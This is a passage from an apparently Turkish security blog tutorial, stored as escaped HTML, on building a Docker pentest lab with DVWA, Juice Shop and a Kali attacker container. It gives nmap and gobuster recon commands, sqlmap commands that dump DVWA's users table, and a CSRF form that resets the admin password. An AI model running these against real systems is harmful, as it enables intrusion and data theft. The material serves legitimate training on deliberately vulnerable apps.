ve Dockerfile&rsquo;lar\u0131n\u0131 git ile takip et.<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>Anl\u0131k g&ouml;r&uuml;nt&uuml; (snapshot):<\/strong> Denemeler &ouml;ncesi ve sonras\u0131 konteyner yap\u0131land\u0131rmalar\u0131n\u0131 kaydet.<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>Loglama:<\/strong> Sald\u0131r\u0131 ve hedef uygulama loglar\u0131n\u0131 toplay\u0131p kar\u015f\u0131la\u015ft\u0131r &mdash; &ouml;\u011frenme &ccedil;ok daha etkili olur.<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>Otomasyon:<\/strong> S\u0131k kulland\u0131\u011f\u0131n senaryolar i&ccedil;in basit scriptler yaz (ba\u015flat\/durdur\/test raporu olu\u015fturma).<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<p>Docker ve Ignitetechnologies gibi kaynaklar\u0131n sundu\u011fu ak\u0131l haritalar\u0131, modern bir pentest laboratuvar\u0131 kurmak i&ccedil;in g&uuml;&ccedil;l&uuml; bir kombinasyon sunar. Kaynaklar\u0131 verimli kullanarak ta\u015f\u0131nabilir ve tekrarlanabilir bir ortam elde eder, siber g&uuml;venlik becerilerinizi h\u0131zla geli\u015ftirebilirsiniz. Bug&uuml;n GitHub&rsquo;daki ilgili repolar\u0131 ve Docker Hub&rsquo;daki zafiyetli uygulamalar\u0131 inceleyerek kendi laboratuvar\u0131n\u0131z\u0131 aya\u011fa kald\u0131r\u0131n.<\/p>\r\n<hr>\r\n<p>Harika &mdash; a\u015fa\u011f\u0131da <strong>iki b&ouml;l&uuml;m<\/strong> halinde haz\u0131rlad\u0131m:<\/p>\r\n<ol>\r\n<li>\r\n<p><strong>Haz\u0131r, &ccedil;al\u0131\u015ft\u0131r\u0131labilir <code>docker-compose.yml<\/code> &ouml;rne\u011fi<\/strong> (hem Juice Shop hem DVWA dahil, a\u011f izolasyonu, kal\u0131c\u0131 veriler). Bu dosyay\u0131 do\u011frudan kullan\u0131p <code>docker-compose up -d<\/code> ile laboratuvar\u0131 aya\u011fa kald\u0131rabilirsin. (Baz\u0131 image isimleri zamanla de\u011fi\u015febilir &mdash; gerekirse Docker Hub&rsquo;dan do\u011frula.)<\/p>\r\n<\/li>\r\n<li>\r\n<p><strong>Daha teknik b&ouml;l&uuml;m<\/strong>: ad\u0131m ad\u0131m &ouml;rnek sald\u0131r\u0131 senaryolar\u0131 (SQLi, XSS, CSRF), kullan\u0131lan komutlar (sqlmap, Burp Suite, Nmap) ve hangi ekran g&ouml;r&uuml;nt&uuml;lerini (screenshot) alman gerekti\u011fine dair net talimatlar. Bu sayede yaz\u0131y\u0131 hem &ouml;\u011fretici hem de prati\u011fe d&ouml;n&uuml;k hale getirebilirsin.<\/p>\r\n<\/li>\r\n<\/ol>\r\n<p>Her \u015fey T&uuml;rk&ccedil;e, SEO-dostu ve blogda do\u011frudan kullanabilece\u011fin formatta. Hadi ba\u015flayal\u0131m!<\/p>\r\n<hr>\r\n<h1>1) <code>docker-compose.yml<\/code> &mdash; &Ccedil;al\u0131\u015f\u0131r &Ouml;rnek (Juice Shop + DVWA + Attacker)<\/h1>\r\n<blockquote>\r\n<p>Not: A\u015fa\u011f\u0131daki <code>docker-compose.yml<\/code> laboratuvar\u0131 izole bir bridge network &uuml;zerinde &ccedil;al\u0131\u015ft\u0131r\u0131r. <code>attacker<\/code> servisi Kali tabanl\u0131 bir g&ouml;r&uuml;nt&uuml; i&ccedil;erir; <code>juice_shop<\/code> ve <code>dvwa<\/code> &ouml;rnek hedef uygulamalard\u0131r. DVWA i&ccedil;in MySQL servisi eklenmi\u015ftir. E\u011fer ba\u015fka hedefler (bWAPP, WebGoat vb.) eklenecekse benzer servis bloklar\u0131 eklemen yeterli.<\/p>\r\n<\/blockquote>\r\n<pre><code class=\"language-yaml\">version: \"3.8\"\r\n\r\nservices:\r\n  # Attacker machine (lightweight kali)\r\n  attacker:\r\n    image: kalilinux\/kali-rolling:latest\r\n    container_name: attacker\r\n    tty: true\r\n    stdin_open: true\r\n    networks:\r\n      - web-lab\r\n    volumes:\r\n      - .\/attacker-data:\/root\r\n    command: \/bin\/bash\r\n    restart: unless-stopped\r\n\r\n  # OWASP Juice Shop (Node.js app, oyunla\u015ft\u0131r\u0131lm\u0131\u015f)\r\n  juice_shop:\r\n    image: bkimminich\/juice-shop:latest\r\n    container_name: juice_shop\r\n    environment:\r\n      - NODE_ENV=development\r\n    ports:\r\n      - \"3000:3000\"   # yerel taray\u0131c\u0131dan eri\u015fim istersen\r\n    networks:\r\n      - web-lab\r\n    restart: unless-stopped\r\n\r\n  # DVWA (Damn Vulnerable Web App) + MySQL\r\n  dvwa_db:\r\n    image: mysql:5.7\r\n    container_name: dvwa_db\r\n    environment:\r\n      MYSQL_ROOT_PASSWORD: rootpass\r\n      MYSQL_DATABASE: dvwa\r\n      MYSQL_USER: dvwauser\r\n      MYSQL_PASSWORD: dvwapass\r\n    volumes:\r\n      - dvwa_db_data:\/var\/lib\/mysql\r\n    networks:\r\n      - web-lab\r\n    restart: unless-stopped\r\n\r\n  dvwa:\r\n    image: vulnerables\/web-dvwa:latest\r\n    container_name: dvwa\r\n    environment:\r\n      - MYSQL_HOST=dvwa_db\r\n      - MYSQL_USER=dvwauser\r\n      - MYSQL_PASSWORD=dvwapass\r\n      - MYSQL_DATABASE=dvwa\r\n    ports:\r\n      - \"8081:80\"   # yerel taray\u0131c\u0131dan eri\u015fim istersen\r\n    networks:\r\n      - web-lab\r\n    depends_on:\r\n      - dvwa_db\r\n    restart: unless-stopped\r\n\r\n  # (\u0130ste\u011fe ba\u011fl\u0131) OWASP WebGoat &ouml;rne\u011fi\r\n  webgoat:\r\n    image: webgoat\/webgoat:latest\r\n    container_name: webgoat\r\n    ports:\r\n      - \"8080:8080\"\r\n    networks:\r\n      - web-lab\r\n    restart: unless-stopped\r\n\r\nnetworks:\r\n  web-lab:\r\n    driver: bridge\r\n\r\nvolumes:\r\n  dvwa_db_data:\r\n  attacker-data:\r\n<\/code><\/pre>\r\n<p>Kullan\u0131m:<\/p>\r\n<ol>\r\n<li>\r\n<p>Bu dosyay\u0131 <code>docker-compose.yml<\/code> ad\u0131yla bir klas&ouml;re koy.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Klas&ouml;rde terminal a&ccedil;: <code>docker-compose up -d<\/code><\/p>\r\n<\/li>\r\n<li>\r\n<p>Servislerin durumunu kontrol et: <code>docker-compose ps<\/code> veya <code>docker ps<\/code><\/p>\r\n<\/li>\r\n<li>\r\n<p>Attacker konteynerine gir: <code>docker exec -it attacker \/bin\/bash<\/code><\/p>\r\n<\/li>\r\n<li>\r\n<p>Juice Shop: <code>http:\/\/localhost:3000<\/code> &mdash; DVWA: <code>http:\/\/localhost:8081<\/code> &mdash; WebGoat: <code>http:\/\/localhost:8080<\/code><\/p>\r\n<\/li>\r\n<\/ol>\r\n<blockquote>\r\n<p>G&uuml;venlik: Laboratuvar\u0131 &uuml;retim a\u011f\u0131ndan <strong>kesinlikle<\/strong> izole et. Bilgisayar\u0131n internete ba\u011fl\u0131ysa bile docker a\u011f\u0131 d\u0131\u015far\u0131ya a&ccedil;\u0131k portlar arac\u0131l\u0131\u011f\u0131yla eri\u015fim olabilir; yaln\u0131zca yerelde eri\u015fim istiyorsan port y&ouml;nlendirmelerini kald\u0131r veya firewall kurallar\u0131na dikkat et.<\/p>\r\n<\/blockquote>\r\n<hr>\r\n<h1>2) Teknik Rehber: Ad\u0131m Ad\u0131m Sald\u0131r\u0131 \/ Test Senaryolar\u0131 (Ekran g&ouml;r&uuml;nt&uuml;leri ile)<\/h1>\r\n<p>A\u015fa\u011f\u0131da &uuml;&ccedil; temel senaryo i&ccedil;in ad\u0131mlar, kullan\u0131lacak komutlar, &ouml;rnek &ccedil;\u0131kt\u0131lar ve hangi ekran g&ouml;r&uuml;nt&uuml;lerini alman gerekti\u011fi yer al\u0131yor. Her b&ouml;l&uuml;mde sald\u0131rgan konteynerinde &ccedil;al\u0131\u015faca\u011f\u0131n\u0131 varsay\u0131yorum.<\/p>\r\n<h2>A) Haz\u0131rl\u0131k &amp; Ke\u015fif<\/h2>\r\n<h3>Ama&ccedil;<\/h3>\r\n<p>Hedef hakk\u0131nda bilgi topla: a&ccedil;\u0131k portlar, servis versiyonlar\u0131, uygulama rotalar\u0131.<\/p>\r\n<h3>Ara&ccedil;lar<\/h3>\r\n<ul>\r\n<li>\r\n<p>Nmap<\/p>\r\n<\/li>\r\n<li>\r\n<p>dirb veya gobuster<\/p>\r\n<\/li>\r\n<li>\r\n<p>curl<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h3>Ad\u0131mlar<\/h3>\r\n<ol>\r\n<li>\r\n<p>Attacker konteynerine gir:<\/p>\r\n<pre><code class=\"language-bash\">docker exec -it attacker \/bin\/bash\r\napt update &amp;&amp; apt install -y nmap gobuster curl\r\n<\/code><\/pre>\r\n<p>(Kali imaj\u0131nda &ccedil;o\u011fu ara&ccedil; haz\u0131r olur; yoksa apt ile y&uuml;kle.)<\/p>\r\n<\/li>\r\n<li>\r\n<p>Hedef servisleri tara (&ouml;r: DVWA <code>dvwa:80<\/code>, Juice Shop <code>:3000<\/code>):<\/p>\r\n<pre><code class=\"language-bash\">nmap -sC -sV -p- --open 172.18.0.0\/16\r\n<\/code><\/pre>\r\n<p>(Yerel a\u011f IP aral\u0131\u011f\u0131n\u0131 kullan. Alternatif olarak <code>nmap -sV dvwa<\/code> veya <code>nmap -p- $(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' dvwa)<\/code>)<\/p>\r\n<\/li>\r\n<li>\r\n<p>Web dizinleri ke\u015ffi:<\/p>\r\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/localhost:8081 -w \/usr\/share\/wordlists\/dirb\/common.txt\r\n<\/code><\/pre>\r\n<\/li>\r\n<\/ol>\r\n<h3>Al\u0131nacak ekran g&ouml;r&uuml;nt&uuml;leri<\/h3>\r\n<ul>\r\n<li>\r\n<p><code>nmap<\/code> tarama &ccedil;\u0131kt\u0131s\u0131 (filename: <code>screenshots\/01-nmap.png<\/code>)<\/p>\r\n<\/li>\r\n<li>\r\n<p>Gobuster sonu&ccedil;lar\u0131 (<code>screenshots\/02-gobuster.png<\/code>)<\/p>\r\n<\/li>\r\n<li>\r\n<p>Hedef uygulama ana sayfas\u0131 (DVWA veya Juice Shop) (<code>screenshots\/03-target-home.png<\/code>)<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<h2>B) SQL Injection (DVWA &ouml;rne\u011fi)<\/h2>\r\n<h3>Ama&ccedil;<\/h3>\r\n<p>Basit SQLi a&ccedil;\u0131\u011f\u0131n\u0131 bulup <code>sqlmap<\/code> ile veri taban\u0131ndan veri &ccedil;ekmek.<\/p>\r\n<h3>Haz\u0131rl\u0131k<\/h3>\r\n<ul>\r\n<li>\r\n<p>DVWA&rsquo;de Security seviyesini Low yap (uygulama i&ccedil;inden ayar).<\/p>\r\n<\/li>\r\n<li>\r\n<p>Giri\u015f yap: (DVWA default kullan\u0131c\u0131 genelde admin\/password).<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h3>Ad\u0131mlar<\/h3>\r\n<ol>\r\n<li>\r\n<p>Hedef formu tespit et (&ouml;r: <code>http:\/\/localhost:8081\/vulnerabilities\/sqli\/<\/code>).<\/p>\r\n<\/li>\r\n<li>\r\n<p><code>sqlmap<\/code> ile test:<\/p>\r\n<pre><code class=\"language-bash\">sqlmap -u \"http:\/\/localhost:8081\/vulnerabilities\/sqli\/?id=1&amp;Submit=Submit\" --cookie=\"PHPSESSID=; security=low\" --dbs --batch\r\n<\/code><\/pre>\r\n<ul>\r\n<li>\r\n<p><code>--cookie<\/code> ile oturum bilgisi ver; <code>--batch<\/code> otomatik onaylar.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<\/li>\r\n<li>\r\n<p>Belirli bir veritaban\u0131n\u0131 &ccedil;ek:<\/p>\r\n<pre><code class=\"language-bash\">sqlmap -u \"http:\/\/localhost:8081\/vulnerabilities\/sqli\/?id=1&amp;Submit=Submit\" --cookie=\"...\" -D dvwa --tables\r\nsqlmap -u \"...\" --cookie=\"...\" -D dvwa -T users --dump\r\n<\/code><\/pre>\r\n<\/li>\r\n<\/ol>\r\n<h3>Ekran g&ouml;r&uuml;nt&uuml;leri<\/h3>\r\n<ul>\r\n<li>\r\n<p>Vulnerable form sayfas\u0131 (<code>screenshots\/10-dvwa-sqli-form.png<\/code>)<\/p>\r\n<\/li>\r\n<li>\r\n<p>sqlmap tarama sonucu (dbs\/list) (<code>screenshots\/11-sqlmap-dbs.png<\/code>)<\/p>\r\n<\/li>\r\n<li>\r\n<p>dump edilmi\u015f tablo &ouml;rne\u011fi (<code>screenshots\/12-sqlmap-dump.png<\/code>)<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h3>Notlar<\/h3>\r\n<ul>\r\n<li>\r\n<p>DVWA gibi uygulamalarda &ouml;nce \"Create \/ Reset DB\" butonunu kullan.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Her komutta <code>--threads<\/code> veya <code>--tamper<\/code> parametreleriyle sqlmap hassas kontrol sa\u011flayabilirsin.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<h2>C) XSS (Juice Shop veya DVWA Stored\/Reflected)<\/h2>\r\n<h3>Ama&ccedil;<\/h3>\r\n<p>Reflected veya Stored XSS tespiti, PoC payload ile taray\u0131c\u0131da JavaScript &ccedil;al\u0131\u015ft\u0131rma.<\/p>\r\n<h3>Ara&ccedil;lar<\/h3>\r\n<ul>\r\n<li>\r\n<p>Basit payload:<\/p>\r\n<\/li>\r\n<li>\r\n<p>Burp Suite (proxy) veya OWASP ZAP<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h3>Ad\u0131mlar<\/h3>\r\n<ol>\r\n<li>\r\n<p>Taray\u0131c\u0131y\u0131 attacker &uuml;zerinden &ccedil;al\u0131\u015ft\u0131r\u0131yorsan veya host taray\u0131c\u0131y\u0131 kullan\u0131yorsan Burp\/ZAP proxy ayarla. (Burp: 127.0.0.1:8080)<\/p>\r\n<\/li>\r\n<li>\r\n<p>Hedef form veya yorum alan\u0131na payload g&ouml;nder:<\/p>\r\n<pre><code class=\"language-html\">\r\n<\/code><\/pre>\r\n<p>(PoC i&ccedil;in alert kullan; veri s\u0131zd\u0131rma senaryosu daha sofistike.)<\/p>\r\n<\/li>\r\n<li>\r\n<p>Burp Repeater ile payload&rsquo;\u0131 manip&uuml;le et ve cevaplar\u0131 incele.<\/p>\r\n<\/li>\r\n<\/ol>\r\n<h3>Ekran g&ouml;r&uuml;nt&uuml;leri<\/h3>\r\n<ul>\r\n<li>\r\n<p>Injection yap\u0131lm\u0131\u015f input alan\u0131 (<code>screenshots\/20-xss-input.png<\/code>)<\/p>\r\n<\/li>\r\n<li>\r\n<p>Taray\u0131c\u0131da a&ccedil;\u0131lan alert veya ba\u015far\u0131l\u0131 PoC (<code>screenshots\/21-xss-alert.png<\/code>)<\/p>\r\n<\/li>\r\n<li>\r\n<p>Burp Proxy history ve iste\u011fin payload ile g&ouml;r&uuml;n&uuml;m&uuml; (<code>screenshots\/22-burp-request.png<\/code>)<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h3>Notlar<\/h3>\r\n<ul>\r\n<li>\r\n<p>Stored XSS'de payload hedef veritaban\u0131na kaydolur; sayfa her ziyaret edildi\u011finde &ccedil;al\u0131\u015f\u0131r.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Modern taray\u0131c\u0131lar i&ccedil;erik g&uuml;venlik politikalar\u0131 (CSP) uygulayabilir &mdash; Juice Shop sandbox ortam\u0131nda &ccedil;o\u011fu test serbesttir.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<h2>D) CSRF (Cross-Site Request Forgery)<\/h2>\r\n<h3>Ama&ccedil;<\/h3>\r\n<p>Basit bir CSRF PoC ile oturumlu kullan\u0131c\u0131ya istenmeyen i\u015flem yapt\u0131rmak.<\/p>\r\n<h3>Ad\u0131mlar<\/h3>\r\n<ol>\r\n<li>\r\n<p>DVWA gibi uygulamada oturum a&ccedil; (&ouml;r: admin).<\/p>\r\n<\/li>\r\n<li>\r\n<p>Hedef i\u015flem var m\u0131 (&ouml;r: \u015fifre de\u011fi\u015fikli\u011fi, ip &ccedil;alma)? Bul.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Basit CSRF HTML dosyas\u0131 haz\u0131rla:<\/p>\r\n<pre><code class=\"language-html\"><!-- csrf-poc.html -->\r\n\r\n  \r\n    <\/code><\/pre>\r\n<form action=\"http:\/\/localhost:8081\/vulnerabilities\/csrf\/\" method=\"POST\"><input name=\"password_new\" type=\"hidden\" value=\"hacked123\"> <input name=\"password_conf\" type=\"hidden\" value=\"hacked123\"><\/form>\r\n<pre><code class=\"language-html\">\r\n    \r\n  \r\n\r\n<\/code><\/pre>\r\n<\/li>\r\n<li>\r\n<p>\u0130\u015flemi oturum a&ccedil;\u0131kken kullan\u0131c\u0131 ziyaret ederse (ve uygulamada CSRF token yoksa) i\u015flem ger&ccedil;ekle\u015fir.<\/p>\r\n<\/li>\r\n<\/ol>\r\n<h3>Ekran g&ouml;r&uuml;nt&uuml;leri<\/h3>\r\n<ul>\r\n<li>\r\n<p>Hedef i\u015flem formu (<code>screenshots\/30-csrf-form.png<\/code>)<\/p>\r\n<\/li>\r\n<li>\r\n<p>PoC HTML'in sunulmas\u0131 ve ba\u015far\u0131l\u0131 sonu&ccedil; (<code>screenshots\/31-csrf-success.png<\/code>)<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<h2>E) Post-Exploit \/ Loglama \/ Raporlama<\/h2>\r\n<h3>&Ouml;neriler<\/h3>\r\n<ul>\r\n<li>\r\n<p>Her testten sonra ba\u015far\u0131l\u0131 ad\u0131mlar\u0131 not al, hangi payloadlar i\u015fe yarad\u0131, hangi header&rsquo;lar de\u011fi\u015ftirildi.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Oturum ve uygulama loglar\u0131n\u0131 <code>\/var\/www\/html\/...\/logs<\/code> veya ilgili storage&rsquo;dan topla.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Basit Markdown tabanl\u0131 rapor olu\u015ftur: bulgu, risk seviyesi, istismar\u0131n tekrar\u0131, d&uuml;zeltme &ouml;nerisi.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<p>&Ouml;rnek rapor ba\u015fl\u0131klar\u0131:<\/p>\r\n<ul>\r\n<li>\r\n<p>&Ouml;zet (Executive Summary)<\/p>\r\n<\/li>\r\n<li>\r\n<p>Test kapsam\u0131 ve metodoloji<\/p>\r\n<\/li>\r\n<li>\r\n<p>Buluntular (CVE benzeri format: ID, Description, Risk, Reproduction, Fix)<\/p>\r\n<\/li>\r\n<li>\r\n<p>Ekran g&ouml;r&uuml;nt&uuml;leri ve veri d&ouml;k&uuml;mleri<\/p>\r\n<\/li>\r\n<li>\r\n<p>Sonu&ccedil; ve &ouml;neriler<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<h2>Ekran G&ouml;r&uuml;nt&uuml;leri \u0130&ccedil;in \u0130pu&ccedil;lar\u0131<\/h2>\r\n<ul>\r\n<li>\r\n<p>Taray\u0131c\u0131 penceresini tam ekran kullan.<\/p>\r\n<\/li>\r\n<li>\r\n<p><code>png<\/code> format\u0131 tercihi: <code>screenshots\/-.png<\/code>.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Her ekran g&ouml;r&uuml;nt&uuml;s&uuml;nde tarih ve saat olsun &mdash; OS saat dilimine g&ouml;re ekleyebilirsin.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Terminal &ccedil;\u0131kt\u0131lar\u0131 i&ccedil;in terminal fontunu b&uuml;y&uuml;t ve arka plan\u0131 temizle; uzun &ccedil;\u0131kt\u0131lar\u0131 k\u0131rpma, &ouml;nemli k\u0131s\u0131mlar\u0131 ekle.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<p>&nbsp;<\/p>\r\n<h1>1)&nbsp;<code>Dockerfile<\/code> &mdash; &ouml;zel attacker image<\/h1>\r\n<blockquote>\r\n<p>Not: Burp Suite Community \/ Professional <code>.jar<\/code> dosyas\u0131 telifli oldu\u011fundan bu imaja otomatik indirilmeye &ccedil;al\u0131\u015f\u0131lmaz. E\u011fer Burp kullanmak istersen <code>burpsuite_community.jar<\/code> (veya pro) dosyas\u0131n\u0131 build context&rsquo;e koyup <code>--build-arg INCLUDE_BURP=yes<\/code> ile build edebilirsin. Alternatif olarak OWASP ZAP (a&ccedil;\u0131k kaynak) otomatik kurulur.<\/p>\r\n<\/blockquote>\r\n<pre><code class=\"language-Dockerfile\"># Dockerfile.attacker\r\nFROM kalilinux\/kali-rolling\r\n\r\nARG INCLUDE_BURP=no\r\nARG BURP_JAR=burpsuite.jar\r\n\r\nENV DEBIAN_FRONTEND=noninteractive\r\nRUN apt-get update &amp;&amp; apt-get install -y \\\r\n    python3 python3-pip git curl wget net-tools iputils-ping \\\r\n    default-jre-headless openjdk-11-jre-headless \\\r\n    sqlmap chromium \\\r\n    xvfb x11vnc supervisor unzip \\\r\n    zaproxy \\\r\n    &amp;&amp; apt-get clean &amp;&amp; rm -rf \/var\/lib\/apt\/lists\/*\r\n\r\n# pip ara&ccedil;lar\u0131 (iste\u011fe ba\u011fl\u0131)\r\nRUN pip3 install --upgrade pip &amp;&amp; pip3 install requests\r\n\r\n# &Ccedil;al\u0131\u015fma dizini\r\nWORKDIR \/root\r\n\r\n# E\u011fer build arg ile burp eklenmi\u015fse kopyala (kullan\u0131c\u0131 kendi yerel jar'\u0131n\u0131 sa\u011flamal\u0131)\r\n# Not: Dockerfile i&ccedil;inde telifli dosyalar\u0131n otomatik indirilmesi uygun de\u011fildir.\r\nARG INCLUDE_BURP\r\nCOPY ${BURP_JAR} \/opt\/burp\/${BURP_JAR}\r\n\r\n# Basit bir ba\u015flatma scripti: shell a&ccedil;mak i&ccedil;in\r\nCOPY docker-entrypoint.sh \/usr\/local\/bin\/docker-entrypoint.sh\r\nRUN chmod +x \/usr\/local\/bin\/docker-entrypoint.sh\r\n\r\n# Portlar (&ouml;r. Burp GUI i&ccedil;in 8081, VNC i&ccedil;in 5900 vs. iste\u011fe ba\u011fl\u0131)\r\nEXPOSE 5900 8081\r\n\r\nENTRYPOINT [\"\/usr\/local\/bin\/docker-entrypoint.sh\"]\r\nCMD [\"\/bin\/bash\"]\r\n<\/code><\/pre>\r\n<p><code>docker-entrypoint.sh<\/code> (ayn\u0131 klas&ouml;rde olu\u015ftur):<\/p>\r\n<pre><code class=\"language-bash\">#!\/bin\/bash\r\n# Basit entrypoint: kullan\u0131c\u0131 interaktif shell al\u0131r.\r\n# E\u011fer burp jar varsa uyar\u0131 ver.\r\nif [ -f \/opt\/burp\/burpsuite.jar ]; then\r\n  echo \"[*] burp.jar bulundu: \/opt\/burp\/burpsuite.jar\"\r\n  echo \"[*] GUI kullanmak istersen X11 y&ouml;nlendirme veya VNC kur.\"\r\nelse\r\n  echo \"[*] burp.jar bulunamad\u0131. OWASP ZAP kurulu, burp kullanmak i&ccedil;in burpsuite jar'\u0131n\u0131 build context'e ekleyip yeniden build et.\"\r\nfi\r\n\r\n# Shell a&ccedil;\r\nexec \"$@\"\r\n<\/code><\/pre>\r\n<blockquote>\r\n<p>A&ccedil;\u0131klama: imaj Kali tabanl\u0131d\u0131r. \u0130&ccedil;inde <code>sqlmap<\/code>, <code>chromium<\/code> (headless), <code>zaproxy<\/code> y&uuml;kl&uuml;. <code>burpsuite.jar<\/code> kullanmak istersen bu jar dosyas\u0131n\u0131 Dockerfile ile ayn\u0131 klas&ouml;re koy ve build arg kullan.<\/p>\r\n<\/blockquote>\r\n<hr>\r\n<h1>2) <code>docker-compose.yml<\/code> &mdash; &ouml;zel attacker ile entegre<\/h1>\r\n<p>A\u015fa\u011f\u0131daki <code>docker-compose.yml<\/code> &ouml;rne\u011fi, attacker imaj\u0131n\u0131 build eder ve daha &ouml;nce verdi\u011fimiz DVWA \/ Juice Shop servisleriyle ayn\u0131 a\u011fda &ccedil;al\u0131\u015ft\u0131r\u0131r.<\/p>\r\n<pre><code class=\"language-yaml\">version: \"3.8\"\r\nservices:\r\n  attacker:\r\n    build:\r\n      context: .\r\n      dockerfile: Dockerfile.attacker\r\n      args:\r\n        INCLUDE_BURP: \"no\"   # e\u011fer burp.jar koyduysan \"yes\" yap\r\n        BURP_JAR: \"burpsuite.jar\"\r\n    image: weblab\/attacker:latest\r\n    container_name: attacker\r\n    tty: true\r\n    stdin_open: true\r\n    networks:\r\n      - web-lab\r\n    volumes:\r\n      - .\/attacker-data:\/root\r\n      - \/tmp\/.X11-unix:\/tmp\/.X11-unix   # X11 forward i&ccedil;in (opsiyonel)\r\n    environment:\r\n      - DISPLAY=${DISPLAY}   # host X11 forward i&ccedil;in\r\n    command: \/bin\/bash\r\n    restart: unless-stopped\r\n\r\n  juice_shop:\r\n    image: bkimminich\/juice-shop:latest\r\n    container_name: juice_shop\r\n    environment:\r\n      - NODE_ENV=development\r\n    ports:\r\n      - \"3000:3000\"\r\n    networks:\r\n      - web-lab\r\n    restart: unless-stopped\r\n\r\n  dvwa_db:\r\n    image: mysql:5.7\r\n    container_name: dvwa_db\r\n    environment:\r\n      MYSQL_ROOT_PASSWORD: rootpass\r\n      MYSQL_DATABASE: dvwa\r\n      MYSQL_USER: dvwauser\r\n      MYSQL_PASSWORD: dvwapass\r\n    volumes:\r\n      - dvwa_db_data:\/var\/lib\/mysql\r\n    networks:\r\n      - web-lab\r\n    restart: unless-stopped\r\n\r\n  dvwa:\r\n    image: vulnerables\/web-dvwa:latest\r\n    container_name: dvwa\r\n    environment:\r\n      - MYSQL_HOST=dvwa_db\r\n      - MYSQL_USER=dvwauser\r\n      - MYSQL_PASSWORD=dvwapass\r\n      - MYSQL_DATABASE=dvwa\r\n    ports:\r\n      - \"8081:80\"\r\n    networks:\r\n      - web-lab\r\n    depends_on:\r\n      - dvwa_db\r\n    restart: unless-stopped\r\n\r\nnetworks:\r\n  web-lab:\r\n    driver: bridge\r\n\r\nvolumes:\r\n  dvwa_db_data:\r\n  attacker-data:\r\n<\/code><\/pre>\r\n<hr>\r\n<h1>3) Build &amp; Run &mdash; Ad\u0131mlar<\/h1>\r\n<ol>\r\n<li>\r\n<p><code>Dockerfile.attacker<\/code>, <code>docker-entrypoint.sh<\/code> ve <code>docker-compose.yml<\/code> ayn\u0131 dizine koy.<\/p>\r\n<\/li>\r\n<li>\r\n<p><em>E\u011fer<\/em> Burp kullanacaksan: kendi <code>burpsuite.jar<\/code> dosyan\u0131 bu dizine koy (&ouml;rnek ad\u0131 <code>burpsuite.jar<\/code>) ve <code>docker-compose.yml<\/code> i&ccedil;inde <code>INCLUDE_BURP<\/code> arg'\u0131n\u0131 <code>yes<\/code> yap veya build komutunda ver. (Yine: Burp jar telifli &mdash; yaln\u0131zca kendi indirdi\u011fin jar'\u0131 kullan.)<\/p>\r\n<\/li>\r\n<li>\r\n<p>Build &amp; run:<\/p>\r\n<\/li>\r\n<\/ol>\r\n<pre><code class=\"language-bash\"># \u0130maj\u0131 build et\r\ndocker-compose build attacker\r\n\r\n# T&uuml;m servislere boot ver\r\ndocker-compose up -d\r\n<\/code><\/pre>\r\n<ol start=\"4\">\r\n<li>\r\n<p>Attacker i&ccedil;ine gir:<\/p>\r\n<\/li>\r\n<\/ol>\r\n<pre><code class=\"language-bash\">docker exec -it attacker \/bin\/bash\r\n<\/code><\/pre>\r\n<ol start=\"5\">\r\n<li>\r\n<p>(Opsiyonel) E\u011fer GUI uygulamalar\u0131 &ccedil;al\u0131\u015ft\u0131racaksan:<\/p>\r\n<\/li>\r\n<\/ol>\r\n<ul>\r\n<li>\r\n<p>Kolay yol: kendi makinan\u0131zda Burp &ccedil;al\u0131\u015ft\u0131r\u0131p proxy (127.0.0.1:8080 vs) ayarlars\u0131n; taray\u0131c\u0131y\u0131 host &uuml;zerinde tutup <code>http:\/\/localhost:3000<\/code>\/<code>8081<\/code> adreslerine istek g&ouml;nderdi\u011finde Burp ile g&ouml;r&uuml;rs&uuml;n.<\/p>\r\n<\/li>\r\n<li>\r\n<p>Konteyner i&ccedil;inde Burp GUI &ccedil;al\u0131\u015ft\u0131rmak istersen X11 veya VNC y&ouml;nlendirmesi yap; bu detayl\u0131 kurulum istersen ek olarak ekleyebilirim.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<hr>\r\n<h1>4) SQLi Tutorial &mdash; DVWA &ouml;rne\u011fi (ad\u0131m ad\u0131m)<\/h1>\r\n<blockquote>\r\n<p>&Ouml;nko\u015ful: DVWA &ccedil;al\u0131\u015f\u0131yor (<code>http:\/\/localhost:8081<\/code>) ve DVWA DB olu\u015fturulmu\u015f. Taray\u0131c\u0131dan DVWA&rsquo;ye eri\u015f, admin ile giri\u015f yap (varsay\u0131lan: <code>admin<\/code>\/<code>password<\/code> veya DVWA aray&uuml;z&uuml;nde kullan\u0131c\u0131 olu\u015ftur). DVWA security seviyesini <strong>Low<\/strong> yap.<\/p>\r\n<\/blockquote>\r\n<h3>A. Ke\u015fif<\/h3>\r\n<ol>\r\n<li>\r\n<p>Hedef form: <code>http:\/\/localhost:8081\/vulnerabilities\/sqli\/<\/code> (DVWA &ouml;rne\u011fi)<\/p>\r\n<\/li>\r\n<li>\r\n<p>Attacker konteynerinde terminal:<\/p>\r\n<\/li>\r\n<\/ol>\r\n<pre><code class=\"language-bash\"># sqlmap kurulu 